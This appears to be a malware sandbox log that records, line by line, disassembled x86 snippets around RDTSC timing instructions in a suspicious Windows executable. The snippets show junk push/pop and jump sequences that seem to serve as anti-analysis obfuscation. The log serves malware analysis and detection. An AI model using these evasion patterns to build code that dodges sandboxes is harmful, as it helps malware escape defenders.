Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A844E second address: 11A8455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8821 second address: 11A8825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8C36 second address: 11A8C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007F2468994E96h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8D4E second address: 11A8D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8D54 second address: 11A8D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A8D58 second address: 11A8DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2468CF6A42h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F2468CF6A46h 0x00000018 jne 00007F2468CF6A36h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jc 00007F2468CF6A36h 0x00000027 jg 00007F2468CF6A36h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A7B5F second address: 11A7B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A7B63 second address: 11A7B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11A7B6B second address: 11A7B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA6h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116C6F8 second address: 116C76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F2468CF6A49h 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnc 00007F2468CF6A44h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007F2468CF6A48h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b pop eax 0x0000002c jmp 00007F2468CF6A3Ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116C882 second address: 116C886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116C8F6 second address: 116C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A47h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116C912 second address: 116C917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CA2B second address: 116CA2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CB07 second address: 116CB0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CB0C second address: 116CB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2468CF6A47h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CB2D second address: 116CB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CC8C second address: 116CC90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CC90 second address: 116CCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2468994EA9h 0x0000000d nop 0x0000000e mov cx, 46F0h 0x00000012 push 00000004h 0x00000014 mov dword ptr [ebp+122D1837h], esi 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116D04F second address: 116D094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F2468CF6A38h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 xor ecx, dword ptr [ebp+122D1BAFh] 0x00000027 push 0000001Eh 0x00000029 mov ecx, 4CB19003h 0x0000002e mov edi, edx 0x00000030 nop 0x00000031 jo 00007F2468CF6A42h 0x00000037 jo 00007F2468CF6A3Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116D094 second address: 116D09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116D09E second address: 116D0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116D37A second address: 116D37E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B1E59 second address: 11B1E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B20F5 second address: 11B20F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B2239 second address: 11B2244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4CE4 second address: 11B4CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F2468994E96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B480C second address: 11B4842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F2468CF6A3Bh 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F2468CF6A45h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2468CF6A3Ah 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4842 second address: 11B4852 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4852 second address: 11B485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B485D second address: 11B4871 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2468994E96h 0x00000008 jbe 00007F2468994E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4871 second address: 11B4875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4875 second address: 11B4879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B4879 second address: 11B487F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11B7C22 second address: 11B7C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468994EA2h 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BB943 second address: 11BB947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BB947 second address: 11BB94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BBC18 second address: 11BBC41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2468CF6A3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 je 00007F2468CF6A6Eh 0x00000017 pushad 0x00000018 ja 00007F2468CF6A36h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BBF01 second address: 11BBF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BBF08 second address: 11BBF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C041D second address: 11C0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C0422 second address: 11C0465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A47h 0x00000007 jmp 00007F2468CF6A41h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2468CF6A45h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BFDA5 second address: 11BFDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F2468994E96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BFDB6 second address: 11BFDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BFDBC second address: 11BFDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2468994EA2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BFDCC second address: 11BFDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11BFDD2 second address: 11BFDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C5C0F second address: 11C5C1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F2468CF6A36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C5C1D second address: 11C5C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2468994EA7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C5C43 second address: 11C5C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C451F second address: 11C4532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007F2468994E96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C4670 second address: 11C467C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C467C second address: 11C4695 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2468994EA2h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C492E second address: 11C4932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C4932 second address: 11C4950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Ah 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F2468994E9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C4C7E second address: 11C4C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11C4C83 second address: 11C4CA3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2468994EABh 0x00000008 jmp 00007F2468994EA5h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CE89 second address: 116CE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CE8E second address: 116CEBD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2468994EA9h 0x00000008 jmp 00007F2468994EA3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jns 00007F2468994E98h 0x00000017 jnc 00007F2468994E9Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CEBD second address: 116CF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov edx, 1ADABBB3h 0x0000000b and edi, 7A218F12h 0x00000011 mov ebx, dword ptr [ebp+12480E77h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F2468CF6A38h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 or edi, dword ptr [ebp+122D2723h] 0x00000037 add eax, ebx 0x00000039 mov dword ptr [ebp+1246EBDEh], ecx 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jbe 00007F2468CF6A36h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116CF0E second address: 116CF72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dx, EB12h 0x0000000e mov ecx, dword ptr [ebp+122D2903h] 0x00000014 push 00000004h 0x00000016 mov edi, edx 0x00000018 call 00007F2468994EA4h 0x0000001d jl 00007F2468994E9Ch 0x00000023 mov dword ptr [ebp+12449A32h], esi 0x00000029 pop edx 0x0000002a nop 0x0000002b push edi 0x0000002c push eax 0x0000002d jmp 00007F2468994EA3h 0x00000032 pop eax 0x00000033 pop edi 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F2468994EA0h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBB0F second address: 11CBB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBB13 second address: 11CBB19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBB19 second address: 11CBB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A41h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBC83 second address: 11CBC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBC87 second address: 11CBC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBC8B second address: 11CBC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F2468994E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBC9A second address: 11CBCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jng 00007F2468CF6A36h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBCAB second address: 11CBCAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBCAF second address: 11CBCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBCB5 second address: 11CBCBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBCBF second address: 11CBCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CBCC3 second address: 11CBCC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CCEDC second address: 11CCF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F2468CF6A36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F2468CF6A3Ch 0x00000012 jns 00007F2468CF6A36h 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007F2468CF6A36h 0x00000020 jmp 00007F2468CF6A3Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CD71E second address: 11CD722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11CD722 second address: 11CD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D5CCE second address: 11D5CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D5CD2 second address: 11D5CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D501B second address: 11D5026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2468994E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D5315 second address: 11D531A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D531A second address: 11D5320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11D58DD second address: 11D58E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 112A7D5 second address: 112A7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF5F4 second address: 11DF5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF5FA second address: 11DF602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF602 second address: 11DF60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF73D second address: 11DF749 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF8CF second address: 11DF8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DF8D5 second address: 11DF8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
